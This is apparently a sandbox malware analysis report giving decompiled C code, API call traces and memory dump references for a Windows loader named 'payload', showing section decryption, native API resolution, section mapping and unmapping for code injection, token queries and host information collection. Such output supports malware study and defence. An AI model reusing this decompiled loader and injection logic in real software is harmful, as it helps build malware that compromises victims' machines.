    				if(_t41 != 0) {
    					 *0x405480 = 1;
    				}
    				_t42 = E00402653();
    				_t90 = _t42;
    				if(_t90 != 0) {
    					L19:
    					if(_t90 == 0xffffffff) {
    						_t90 = GetLastError();
    					}
    					goto L21;
    				} else {
    					_t74 = 6;
    					memset( &_v28, _t42, _t74 << 2);
    					_t45 =  *0x405498; // 0x736c6e70
    					if(E004026C5(0,  &_v28,  &_v12, _t45 ^ 0xed79247c) == 0) {
    						_t90 = 0xb;
    						goto L19;
    					}
    					_t50 = _v12;
    					_v60 = _v60 & _t90;
    					_t87 = _v28;
    					_t72 =  *0x405494; // 0x0
    					_t76 = _t50;
    					_t51 = _t50 >> 2;
    					_v44.x = _t76;
    					_t81 = _t87;
    					_v56.x = _t51;
    					if(_t51 == 0) {
    						L12:
    						_t77 = _t76 & 0x00000003;
    						if(_t77 == 0) {
    							L15:
    							if(( *0x405480 & 0x00000001) != 0) {
    								_v48 = 0x10;
    							}
    							_t52 =  *0x405478; // 0xde4
    							_v36 = _t52;
    							_v32 = GetCurrentThreadId();
    							_t54 =  *0x405474; // 0xcc
    							_v44.x = _t54;
    							_v44.y = GetCurrentThread();
    							_t57 = E0040134B( &_v28,  &_v44, _v48); // executed
    							_t90 = _t57;
    							goto L19;
    						}
    						_t93 = _t77;
    						_t78 = _t81;
    						_t88 = _t87 - _t81;
    						do {
    							 *_t78 =  *(_t88 + _t78) ^ _t72;
    							_t78 =  &(_t78[1]);
    							_t93 = _t93 - 1;
    						} while (_t93 != 0);
    						goto L15;
    					} else {
    						goto L10;
    					}
    					do {
    						L10:
    						_v60 = _v60 + 1;
    						_t60 =  *_t87;
    						asm("rol eax, cl");
    						_t87 =  &(_t87[1]);
    						_t90 = _t60 ^ _t90 ^ _t72;
    						 *_t81 = _t90;
    						_t81 =  &(_t81[1]);
    						_t22 =  &_v56;
    						 *_t22 = _v56.x - 1;
    					} while ( *_t22 != 0);
    					_t76 = _v44.x;
    					goto L12;
    				}
    			}

    APIs
      • Part of subcall function 00401AA8: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00401086,?,00000000), ref: 00401AB7
      • Part of subcall function 00401AA8: GetVersion.KERNEL32(?,00000000), ref: 00401AC6
      • Part of subcall function 00401AA8: GetCurrentProcessId.KERNEL32(?,00000000), ref: 00401ADD
      • Part of subcall function 00401AA8: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000000), ref: 00401AF6
    • GetCursorPos.USER32(?), ref: 0040109B
    • WaitForSingleObject.KERNEL32(00000040), ref: 004010A8
    • GetCursorPos.USER32(?), ref: 004010B7
      • Part of subcall function 00401B1C: lstrcpynA.KERNEL32(?,.bss,00000008,773DA47B,0000000C), ref: 00401B4A
      • Part of subcall function 00401B1C: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 00401BBD
      • Part of subcall function 00401B1C: memcpy.NTDLL(?,00000000,?,?,?,00000001), ref: 00401C06
      • Part of subcall function 00401B1C: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,00000001), ref: 00401C1F
      • Part of subcall function 00401C4A: GetModuleHandleA.KERNEL32(KERNEL32.DLL,0000000C,?,?,004010E8,?,00000000), ref: 00401C67
      • Part of subcall function 00401C4A: GetProcAddress.KERNEL32(00000000,IsWow64Process,?,?,004010E8,?,00000000), ref: 00401C78
      • Part of subcall function 00401C4A: IsWow64Process.KERNELBASE(000000CC,00000000,0000000C,?,?,004010E8,?,00000000), ref: 00401C90
      • Part of subcall function 00402653: GetModuleHandleA.KERNEL32(NTDLL.DLL,773DA47B,0000000C,?,?,004010FB,?,00000000), ref: 00402664
      • Part of subcall function 00402653: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,004010FB,?,00000000), ref: 00402674
    • GetLastError.KERNEL32(?,00000000), ref: 004011E2
      • Part of subcall function 004026C5: memcpy.NTDLL(00000000,?,?,?,?,00000000,?,00000006,00000006,?,00401128,?,?,736C6E70,?,00000000), ref: 004027A3
    • GetCurrentThreadId.KERNEL32(?,?,736C6E70,?,00000000), ref: 004011A7
    • GetCurrentThread.KERNEL32(?,00000000), ref: 004011BA
      • Part of subcall function 0040134B: memcpy.NTDLL(?,?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00401479
      • Part of subcall function 0040134B: memcpy.NTDLL(?,?,00000018,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004014C8
      • Part of subcall function 0040134B: memcpy.NTDLL(?,00401851,00000800,?,?,?,00000000), ref: 00401538
      • Part of subcall function 0040134B: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 00401563
      • Part of subcall function 0040134B: RtlNtStatusToDosError.NTDLL(00000000), ref: 0040156A
      • Part of subcall function 0040134B: CloseHandle.KERNEL32(00000000), ref: 00401579
      • Part of subcall function 0040134B: memset.NTDLL ref: 0040158D
    • ExitProcess.KERNEL32 ref: 004011F4
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.22428269387.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.22428255140.00400000.00000002.sdmp
    • Associated: 00000001.00000002.22428283830.00404000.00000002.sdmp
    • Associated: 00000001.00000002.22428296316.00405000.00000004.sdmp
    • Associated: 00000001.00000002.22428312812.00407000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_payload.jbxd

Control-flow graph for function 00401B1C (basic blocks 00401B1C-00401C47; legend: Executed / Not Executed): rendered graph omitted
    C-Code - Quality: 82%
    			E00401B1C(intOrPtr _a4) {
    				char _v12;
    				intOrPtr _v16;
    				intOrPtr _v20;
    				void* _v23;
    				char _v24;
    				signed int _v32;
    				signed int _v36;
    				void* _t38;
    				intOrPtr* _t39;
    				long _t41;
    				void* _t42;
    				intOrPtr _t46;
    				char _t49;
    				signed int _t50;
    				intOrPtr _t51;
    				intOrPtr _t60;
    				void* _t65;
    				intOrPtr _t66;
    				void* _t71;
    				intOrPtr _t72;
    
    				_t66 =  *0x405484; // 0x400000
    				_t49 = 0;
    				_v24 = 0;
    				asm("stosd");
    				asm("stosw");
    				asm("stosb");
    				_v16 = _t66;
    				_v12 = 0;
    				lstrcpynA( &_v24, ".bss", 8);
    				_t6 = _t66 + 0x3c; // 0xe8
    				_t38 =  *_t6 + _t66;
    				_t50 =  *(_t38 + 6) & 0x0000ffff;
    				_t39 = ( *(_t38 + 0x14) & 0x0000ffff) + _t38 + 0x18;
    				do {
    					if( *_t39 == _v24 &&  *((intOrPtr*)(_t39 + 4)) == _v20) {
    						_t49 = _t39;
    					}
    					_t39 = _t39 + 0x28;
    					_t50 = _t50 - 1;
    				} while (_t50 != 0 && _t49 == 0);
    				if(_t49 == 0) {
    					_v12 = 2;
    				} else {
    					_t51 =  *((intOrPtr*)(_t49 + 0xc));
    					if(_t51 == 0 ||  *(_t49 + 0x10) == 0) {
    						_v12 = 0xb;
    					} else {
    						_t41 =  *(_t49 + 0x10);
    						asm("movsd");
    						asm("movsd");
    						asm("movsd");
    						_t71 = (_t41 + _t51 ^ _v36 ^ _v32) + _a4;
    						_t42 = VirtualAlloc(0, _t41, 0x3000, 4); // executed
    						_t65 = _t42;
    						if(_t65 == 0) {
    							_v12 = 8;
    						} else {
    							_t72 = _v16;
    							E00402989(_t42,  *((intOrPtr*)(_t49 + 0xc)) + _t72,  *(_t49 + 0x10), _t71, 1);
    							_t60 =  *((intOrPtr*)(_t49 + 0xc));
    							_t46 =  *((intOrPtr*)(_t65 - _t60 - _t72 + 0x4061c4)) -  *((intOrPtr*)(_t65 - _t60 - _t72 + 0x4061cc)) +  *((intOrPtr*)(_t65 - _t60 - _t72 + 0x4061c0));
    							 *0x405498 = _t46;
    							if(_t46 != 0x736c6e70) {
    								_v12 = 0xc;
    							} else {
    								memcpy(_t60 + _t72, _t65,  *(_t49 + 0x10));
    							}
    							VirtualFree(_t65, 0, 0x8000); // executed
    						}
    					}
    				}
    				return _v12;
    			}

    APIs
    • lstrcpynA.KERNEL32(?,.bss,00000008,773DA47B,0000000C), ref: 00401B4A
    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 00401BBD
    • memcpy.NTDLL(?,00000000,?,?,?,00000001), ref: 00401C06
    • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,00000001), ref: 00401C1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.22428269387.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.22428255140.00400000.00000002.sdmp
    • Associated: 00000001.00000002.22428283830.00404000.00000002.sdmp
    • Associated: 00000001.00000002.22428296316.00405000.00000004.sdmp
    • Associated: 00000001.00000002.22428312812.00407000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_payload.jbxd

Control-flow graph for function 00401203 (basic blocks 00401203-004012A9; legend: Executed / Not Executed): rendered graph omitted
    C-Code - Quality: 86%
    			E00401203(signed int __edx, void* _a4) {
    				void* __edi;
    				struct HINSTANCE__* _t4;
    				signed int _t6;
    				signed int _t8;
    				signed int _t10;
    				void* _t17;
    				void* _t18;
    				signed int _t19;
    				void* _t21;
    
    				_t19 = __edx;
    				_t21 = 0;
    				if(( *0x405444 |  *0x405448) == 0 || ( *0x40544c |  *0x405450) == 0 || ( *0x405454 |  *0x405458) == 0) {
    					_t21 = 0x7f;
    					_t4 = GetModuleHandleA("NTDLL.DLL");
    					_t20 = _t4;
    					if(_t4 != 0) {
    						_t6 = E00401C9F(_t17, _t18, _t20, "LdrLoadDll"); // executed
    						asm("cdq");
    						 *0x405444 = _t6;
    						 *0x405448 = _t19;
    						if((_t6 | _t19) != 0) {
    							_t8 = E00401C9F(_t17, _t18, _t20, "LdrGetProcedureAddress"); // executed
    							asm("cdq");
    							 *0x40544c = _t8;
    							 *0x405450 = _t19;
    							if((_t8 | _t19) != 0) {
    								_t10 = E00401C9F(_t17, _t18, _t20, "ZwProtectVirtualMemory"); // executed
    								asm("cdq");
    								 *0x405454 = _t10;
    								 *0x405458 = _t19;
    								if((_t10 | _t19) != 0) {
    									_t21 = 0;
    									goto L8;
    								}
    							}
    						}
    					}
    				} else {
    					L8:
    					memcpy(_a4, "3!Pw", 0x18);
    				}
    				return _t21;
    			}

    APIs
    • GetModuleHandleA.KERNEL32(NTDLL.DLL,?,?,00401525,?,?,?,00000000), ref: 00401236
      • Part of subcall function 00401C9F: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00401CEF
      • Part of subcall function 00401C9F: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,0040124C,LdrLoadDll), ref: 00401D01
      • Part of subcall function 00401C9F: ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 00401D19
      • Part of subcall function 00401C9F: CloseHandle.KERNEL32(?), ref: 00401D34
    • memcpy.NTDLL(?,3!Pw,00000018,ZwProtectVirtualMemory,LdrGetProcedureAddress,LdrLoadDll), ref: 0040129D
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.22428269387.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.22428255140.00400000.00000002.sdmp
    • Associated: 00000001.00000002.22428283830.00404000.00000002.sdmp
    • Associated: 00000001.00000002.22428296316.00405000.00000004.sdmp
    • Associated: 00000001.00000002.22428312812.00407000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_payload.jbxd

    Control-flow Graph

    APIs
    • NtOpenProcess.NTDLL(00000000,00000400,?,012A1E91), ref: 012A3BAF
    • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 012A3BC2
    • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 012A3BDE
      • Part of subcall function 012A1000: RtlAllocateHeap.NTDLL(00000000,?,012A3BE8), ref: 012A100C
    • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000,00000000), ref: 012A3BFB
    • memcpy.NTDLL(00000000,00000000,0000001C), ref: 012A3C08
      • Part of subcall function 012A1015: HeapFree.KERNEL32(00000000,?,012A3C17), ref: 012A1021
    • NtClose.NTDLL(?), ref: 012A3C1A
    • NtClose.NTDLL(00000000), ref: 012A3C24
    Memory Dump Source
    • Source File: 00000001.00000002.22428592350.012A1000.00000020.sdmp, Offset: 012A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12a1000_payload.jbxd

Control-flow graph for function 012A44A2 (basic blocks 012A44A2-012A458F; legend: Executed / Not Executed): rendered graph omitted
    APIs
    • RtlAllocateHeap.NTDLL(00000000,?), ref: 012A44DF
    • HeapFree.KERNEL32(00000000,00000000), ref: 012A4510
    • GetComputerNameW.KERNEL32(00000000,?), ref: 012A451E
    • RtlAllocateHeap.NTDLL(00000000,?), ref: 012A4535
    • GetComputerNameW.KERNEL32(00000000,?), ref: 012A4546
    • HeapFree.KERNEL32(00000000,00000000), ref: 012A4567
    Memory Dump Source
    • Source File: 00000001.00000002.22428592350.012A1000.00000020.sdmp, Offset: 012A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12a1000_payload.jbxd

Control-flow graph for function 0040218D (basic blocks 0040218D-004022AC; legend: Executed / Not Executed): rendered graph omitted
    C-Code - Quality: 77%
    			E0040218D(intOrPtr* __eax, void* __ecx, void* __edx, intOrPtr* __esi) {
    				long _v8;
    				char _v12;
    				intOrPtr _v544;
    				intOrPtr _v552;
    				void _v724;
    				char _v728;
    				long _t39;
    				long _t47;
    				intOrPtr _t54;
    				void* _t55;
    				intOrPtr* _t57;
    				void* _t59;
    				intOrPtr* _t60;
    				intOrPtr _t61;
    				intOrPtr* _t62;
    				void* _t66;
    
    				_t62 = __esi;
    				_t59 = __edx;
    				_t55 = __ecx;
    				_t60 = __eax;
    				_v728 = 0;
    				memset( &_v724, 0, 0x2c8);
    				_t66 =  *((intOrPtr*)(_t60 + 8)) -  *0x405478; // 0xde4
    				if(_t66 == 0) {
    					_push( *((intOrPtr*)(__esi + 0x10)));
    					if( *((intOrPtr*)(__esi + 8))() == 0) {
    						goto L13;
    					} else {
    						_v8 = 0;
    						goto L12;
    					}
    				} else {
    					_v728 = 0x10003;
    					_t54 = E00402603(_t55,  *_t60);
    					if(_t54 == 0) {
    						L13:
    						_v8 = GetLastError();
    					} else {
    						_t39 = E0040259F( *((intOrPtr*)(_t60 + 4)),  &_v728);
    						_v8 = _t39;
    						if(_t39 != 0) {
    							L12:
    							if(_v8 == 0xffffffff) {
    								goto L13;
    							}
    						} else {
    							 *(__esi + 4) =  *(__esi + 4) & 0x00000000;
    							 *__esi = _v544;
    							_t11 = _t54 + 0x218; // 0x218
    							_v544 = _t11;
    							_t13 = _t62 + 0x218; // 0x218
    							_v552 = _t54;
    							memcpy(_t13, E00402C82, 0x100);
    							_t16 = _t62 + 0x18; // 0x18
    							asm("cdq");
    							if( *((intOrPtr*)(__esi + 0x10)) == _t16 &&  *((intOrPtr*)(__esi + 0x14)) == _t59) {
    								asm("adc ecx, ecx");
    								 *((intOrPtr*)(__esi + 0x10)) = _t54 + 0x18;
    								 *((intOrPtr*)(__esi + 0x14)) = 0;
    							}
    							if(E004025C0( *_t60, _t54, _t62,  &_v12) != 0) {
    								_t57 =  *0x405020;
    								_t61 =  *((intOrPtr*)(_t60 + 4));
    								_t47 = 0x7f;
    								if(_t57 != 0) {
    									_t47 = RtlNtStatusToDosError( *_t57(_t61,  &_v728));
    								}
    								_v8 = _t47;
    								goto L12;
    							}
    						}
    					}
    				}
    				return _v8;
    			}

    APIs
    • memset.NTDLL ref: 004021AF
    • GetLastError.KERNEL32(?,00000318,00000008), ref: 0040229D
      • Part of subcall function 00402603: RtlNtStatusToDosError.NTDLL(00000000), ref: 0040263B
      • Part of subcall function 00402603: SetLastError.KERNEL32(00000000), ref: 00402642
      • Part of subcall function 0040259F: RtlNtStatusToDosError.NTDLL(00000000), ref: 004025B7
    • memcpy.NTDLL(00000218,00402C82,00000100,?,00010003,?,?,00000318,00000008), ref: 0040222A
      • Part of subcall function 004025C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 004025F0
      • Part of subcall function 004025C0: SetLastError.KERNEL32(00000000,?,00000318,00000008), ref: 004025F7
    • RtlNtStatusToDosError.NTDLL(00000000), ref: 0040227F
    Memory Dump Source
    • Source File: 00000001.00000002.22428269387.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.22428255140.00400000.00000002.sdmp
    • Associated: 00000001.00000002.22428283830.00404000.00000002.sdmp
    • Associated: 00000001.00000002.22428296316.00405000.00000004.sdmp
    • Associated: 00000001.00000002.22428312812.00407000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_payload.jbxd
    C-Code - Quality: 50%
    			E004015E5(intOrPtr _a4, void** _a8, void* _a12) {
    				int _v12;
    				void* _v20;
    				void* _v24;
    				int _v28;
    				int _v32;
    				long _v36;
    				int _v40;
    				int _v44;
    				void* _v48;
    				long _t29;
    				long _t33;
    				long _t37;
    				intOrPtr* _t41;
    				long _t45;
    
    				asm("stosd");
    				asm("stosd");
    				asm("stosd");
    				asm("stosd");
    				asm("stosd");
    				_t41 = _a12;
    				asm("stosd");
    				_v24 = _a4;
    				_t29 = 0x40;
    				_v36 = _t29;
    				_a12 = 0;
    				_v12 = 0;
    				_v48 = 0x18;
    				_v44 = 0;
    				_v40 = 0;
    				_v32 = 0;
    				_v28 = 0;
    				_t33 = NtCreateSection( &_a12, 0xf001f,  &_v48,  &_v24, _t29, 0x8000000, 0); // executed
    				if(_t33 < 0) {
    					_t45 = RtlNtStatusToDosError(_t33);
    				} else {
    					_t37 = E004015A6(_a12, 0xffffffff,  &_v12); // executed
    					_t45 = _t37;
    					if(_t45 == 0) {
    						memset(_v12, 0, _v24);
    						 *_a8 = _v12;
    						if(_t41 != 0) {
    							 *_t41 = _a12;
    						}
    					}
    				}
    				if(_a12 != 0 && _t41 == 0) {
    					__imp__ZwClose(_a12);
    				}
    				return _t45;
    			}

    APIs
    • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 00401640
    • memset.NTDLL ref: 00401665
    • RtlNtStatusToDosError.NTDLL(00000000), ref: 00401681
    • ZwClose.NTDLL(?), ref: 00401695
      • Part of subcall function 004015A6: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 004015D3
      • Part of subcall function 004015A6: RtlNtStatusToDosError.NTDLL(00000000), ref: 004015DA
    Memory Dump Source
    • Source File: 00000001.00000002.22428269387.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.22428255140.00400000.00000002.sdmp
    • Associated: 00000001.00000002.22428283830.00404000.00000002.sdmp
    • Associated: 00000001.00000002.22428296316.00405000.00000004.sdmp
    • Associated: 00000001.00000002.22428312812.00407000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_payload.jbxd
    APIs
    • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 012AE1E1
    • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 012AE24B
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.22428653558.012AE000.00000040.sdmp, Offset: 012AE000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12ae000_payload.jbxd
    APIs
      • Part of subcall function 012A4387: lstrlen.KERNEL32(?,00000000,?,00000000,012A1BD9,?,00000000,?,00000000,?,?,012A1D55), ref: 012A4390
      • Part of subcall function 012A4387: mbstowcs.NTDLL ref: 012A43B7
      • Part of subcall function 012A4387: memset.NTDLL ref: 012A43C9
    • GetSystemTimeAsFileTime.KERNEL32(?,012A1D55,00000000,?,00000000,?,00000000,?,?,012A1D55), ref: 012A1BFC
      • Part of subcall function 012A25A8: SafeArrayCreate.OLEAUT32(00000011,00000001,012AC9E8), ref: 012A25D0
      • Part of subcall function 012A25A8: memcpy.NTDLL(?,012A1C21,00000008), ref: 012A25EA
      • Part of subcall function 012A25A8: SafeArrayDestroy.OLEAUT32(012A1D55), ref: 012A2616
    • HeapFree.KERNEL32(00000000,00000000,012A1D55), ref: 012A1C2C
    Memory Dump Source
    • Source File: 00000001.00000002.22428592350.012A1000.00000020.sdmp, Offset: 012A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12a1000_payload.jbxd
    C-Code - Quality: 75%
    			E004015A6(void* _a4, void* _a8, PVOID* _a12) {
    				long _v8;
    				void* _v12;
    				void* _v16;
    				long _t12;
    
    				_v16 = 0;
    				asm("stosd");
    				_v8 = 0;
    				_t12 = NtMapViewOfSection(_a4, _a8, _a12, 0, 0,  &_v16,  &_v8, 2, 0, 0x40); // executed
    				return RtlNtStatusToDosError(_t12);
    			}

    APIs
    • NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 004015D3
    • RtlNtStatusToDosError.NTDLL(00000000), ref: 004015DA
    Memory Dump Source
    • Source File: 00000001.00000002.22428269387.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.22428255140.00400000.00000002.sdmp
    • Associated: 00000001.00000002.22428283830.00404000.00000002.sdmp
    • Associated: 00000001.00000002.22428296316.00405000.00000004.sdmp
    • Associated: 00000001.00000002.22428312812.00407000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_payload.jbxd
    APIs
      • Part of subcall function 012A1000: RtlAllocateHeap.NTDLL(00000000,?,012A3BE8), ref: 012A100C
    • CoCreateInstance.OLE32(012AC028,00000000,00000004,012AC048,00000000), ref: 012A5128
      • Part of subcall function 012A1015: HeapFree.KERNEL32(00000000,?,012A3C17), ref: 012A1021
    Memory Dump Source
    • Source File: 00000001.00000002.22428592350.012A1000.00000020.sdmp, Offset: 012A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12a1000_payload.jbxd

    Control-flow Graph

    APIs
    • RtlQueryPerformanceFrequency.NTDLL(?), ref: 012A4AB7
    • RtlQueryPerformanceCounter.NTDLL(?), ref: 012A4AC1
    • _aulldiv.NTDLL(?,?,?,?), ref: 012A4AD3
      • Part of subcall function 012A4642: RtlEnterCriticalSection.NTDLL(012AB26C), ref: 012A465E
      • Part of subcall function 012A4642: RtlLeaveCriticalSection.NTDLL(012AB26C), ref: 012A467C
    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 012A4B15
    • RtlEnterCriticalSection.NTDLL(012AB26C), ref: 012A4B38
    • RtlLeaveCriticalSection.NTDLL(012AB26C), ref: 012A4B56
      • Part of subcall function 012A491D: lstrcat.KERNEL32(00000000,?), ref: 012A4966
      • Part of subcall function 012A491D: StrTrimA.SHLWAPI(00000000,012AA278), ref: 012A4983
    • StrTrimA.SHLWAPI(00000000,012AA27C), ref: 012A4B8D
      • Part of subcall function 012A42F8: lstrcpy.KERNEL32(00000000,/images/), ref: 012A4323
      • Part of subcall function 012A42F8: lstrcat.KERNEL32(00000000,?), ref: 012A432E
    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 012A4CBB
      • Part of subcall function 012A4387: lstrlen.KERNEL32(?,00000000,?,00000000,012A1BD9,?,00000000,?,00000000,?,?,012A1D55), ref: 012A4390
      • Part of subcall function 012A4387: mbstowcs.NTDLL ref: 012A43B7
      • Part of subcall function 012A4387: memset.NTDLL ref: 012A43C9
    • wcstombs.NTDLL ref: 012A4C53
      • Part of subcall function 012A54F6: memcpy.NTDLL(00000000,012AA0A4,-00000001,?,012AA0A4,00000000,012A4C65,00000000,00000000,012AA0A4,?,?,00000000), ref: 012A55AE
      • Part of subcall function 012A1015: HeapFree.KERNEL32(00000000,?,012A3C17), ref: 012A1021
      • Part of subcall function 012A4F8D: SysAllocString.OLEAUT32(?), ref: 012A4FCB
      • Part of subcall function 012A4F8D: ObjectStublessClient10.OLE32(?,?), ref: 012A5064
      • Part of subcall function 012A4F8D: StrStrIW.SHLWAPI(?,012AC000), ref: 012A507B
      • Part of subcall function 012A4F8D: SysFreeString.OLEAUT32(?), ref: 012A509B
      • Part of subcall function 012A4F8D: SafeArrayDestroy.OLEAUT32(?), ref: 012A50E6
      • Part of subcall function 012A4F8D: SysFreeString.OLEAUT32(?), ref: 012A50F4
    • HeapFree.KERNEL32(00000000,?,00000000), ref: 012A4CAB
      • Part of subcall function 012A45F0: RtlEnterCriticalSection.NTDLL(012AB26C), ref: 012A45F9
      • Part of subcall function 012A45F0: Sleep.KERNEL32(0000000A,?,012A1D8F,00000002,?,?), ref: 012A4603
      • Part of subcall function 012A45F0: RtlLeaveCriticalSection.NTDLL(012AB26C), ref: 012A4636
      • Part of subcall function 012A5103: CoCreateInstance.OLE32(012AC028,00000000,00000004,012AC048,00000000), ref: 012A5128
    • HeapFree.KERNEL32(00000000,00000000,?), ref: 012A4CC9
    • HeapFree.KERNEL32(00000000,?), ref: 012A4CD9
    • HeapFree.KERNEL32(00000000,?), ref: 012A4CE9
    Memory Dump Source
    • Source File: 00000001.00000002.22428592350.012A1000.00000020.sdmp, Offset: 012A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12a1000_payload.jbxd
    C-Code - Quality: 49%
    			E004019C6() {
    				void* _t15;
    				void* _t16;
    				intOrPtr* _t17;
    				intOrPtr _t18;
    				intOrPtr _t19;
    				struct HINSTANCE__* _t23;
    				intOrPtr _t24;
    				struct HINSTANCE__* _t27;
    				void* _t28;
    				intOrPtr _t29;
    				long _t31;
    				intOrPtr* _t33;
    				intOrPtr _t34;
    				void* _t39;
    				void* _t42;
    				void* _t43;
    				intOrPtr* _t45;
    				signed int _t52;
    				intOrPtr* _t53;
    				signed int _t59;
    				signed int _t60;
    				signed int _t62;
    				signed int _t66;
    				signed int* _t69;
    				void* _t71;
    				void* _t75;
    				void* _t77;
    				intOrPtr* _t79;
    
    				_t15 = HeapCreate(0x40000, 0x688, 0x688); // executed
    				if(_t15 == 0) {
    					L21:
    					L22:
    					goto L22;
    				}
    				_t52 =  ~(0 - _t15);
    				_t16 = 0;
    				_t69 = 0x4040f4;
    				_t59 =  ~0xFFFFFFFFA363D87B;
    				_push(_t52);
    				while(_t16 != 0x688) {
    					_t62 =  *_t69;
    					_t69 =  &(_t69[1]);
    					_t66 =  !_t62 + 0x28 + _t59 - 1;
    					_t60 = 0xffffffff;
    					_t59 = _t60 & _t66;
    					 *_t52 = _t66;
    					asm("clc");
    					asm("sbb ecx, 0xfffffffc");
    					_t16 = _t16 + 4;
    				}
    				_pop(_t53);
    				_t17 =  *_t53(__imp__LoadLibraryA);
    				 *_t17 =  *_t17 + _t17;
    				 *_t17 =  *_t17 + _t17;
    				 *_t17 =  *_t17 + _t17;
    				 *_t17 =  *_t17 + _t17;
    				 *_t17 =  *_t17 + _t17;
    				 *((intOrPtr*)(_t59 + 1)) =  *((intOrPtr*)(_t59 + 1)) + _t53;
    				 *_t79 =  *_t79 - 1;
    				_push("vwzhywkzcohliu");
    				_push("oledcrpjmksdjf");
    				_t18 = E00401CAE(_t17);
    				__eflags = _t18;
    				if(_t18 != 0) {
    					L9:
    					_push(1);
    					 *_t79 =  *_t79 - 1;
    					_push("vwzhywkzcohliu");
    					_push("oledcrpjmksdjf"); // executed
    					_t19 = E00401CAE(_t18); // executed
    					__eflags = _t19;
    					if(_t19 != 0) {
    						goto L21;
    					}
    					__eflags = _t77 - 0xfd00;
    					if(_t77 < 0xfd00) {
    						goto L21;
    					}
    					 *0x305061 = 0x6b;
    					 *0x00305062 = 0x65;
    					 *0x00305063 = 0x72;
    					 *0x00305064 = 0x6e;
    					 *0x00305065 = 0x65;
    					 *0x00305066 = 0x6c;
    					 *0x00305067 = 0x33;
    					_t23 = LoadLibraryA("kernel32.dll");
    					 *0x40500e = _t23;
    					_t45 = "pejpCreate";
    					 *_t45 = 0x70616548;
    					 *((short*)(_t45 + 4)) = 0x7243;
    					 *((short*)(_t45 + 6)) = 0x6165;
    					_push(_t45);
    					_push(_t23);
    					_push(__imp__LoadLibraryExW);
    					_pop( *0x40500a);
    					_push(_t23);
    					_push(1);
    					 *_t79 =  *_t79 - 1;
    					_push("vwzhywkzcohliu");
    					_push("oledcrpjmksdjf"); // executed
    					_t24 = E00401CAE(_t23); // executed
    					__eflags = _t24;
    					if(_t24 != 0) {
    						goto L21;
    					}
    					L"oidsapi.dll" = 0x6e;
    					M00405038 = 0x74;
    					_t27 = LoadLibraryExW( &((L"")[1]), 0, 0);
    					 *((intOrPtr*)(_t77 - 4)) = _t27;
    					_push(_t27);
    					__eflags = _t27;
    					if(_t27 == 0) {
    						goto L21;
    					}
    					_push("zzdjjqpqaxlgt"); // executed
    					_t28 = E00402E18(_t27); // executed
    					_push("true");
    					 *_t79 =  *_t79 - 1;
    					_push(0x4050b3);
    					_push("bkktdsxxkjueaz"); // executed
    					_t29 = E00402BB3(_t28); // executed
    					__eflags = _t29;
    					if(_t29 != 0) {
    						goto L21;
    					}
    					_push(0x1e);
    					do {
    						_t31 = WaitForSingleObject(0xffffffff, 1); // executed
    						 *_t79 =  *_t79 - 1;
    						__eflags =  *_t79;
    					} while ( *_t79 != 0);
    					 *0x40501a = 0;
    					_push("zzdjjqpqaxlgt"); // executed
    					E00402E18(_t31); // executed
    					_pop(_t71);
    					 *((intOrPtr*)(_t79 + 4)) =  *((intOrPtr*)(_t79 + 4)) +  *((intOrPtr*)(_t71 + 0x3c));
    					_t75 = _t71;
    					 *0x405002 = _t75 + 0xa4;
